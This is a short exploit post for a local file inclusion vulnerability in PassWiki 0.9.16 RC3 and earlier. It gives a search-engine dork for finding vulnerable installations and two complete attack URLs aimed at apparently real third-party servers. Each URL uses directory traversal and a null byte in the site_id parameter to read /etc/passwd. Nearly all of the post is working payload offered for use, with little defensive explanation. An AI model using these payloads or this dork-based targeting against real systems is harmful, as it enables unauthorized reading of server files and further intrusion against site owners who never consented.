PassWiki versions 0.9.16 RC3 and below suffer from a local file inclusion vulnerability.
baeb923b8ab1ba8a3e6b1249e3c2c70cdork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
author:mozi2weed@yahoo.com
http://rstzone.org
Comments
No comments yet, be the first!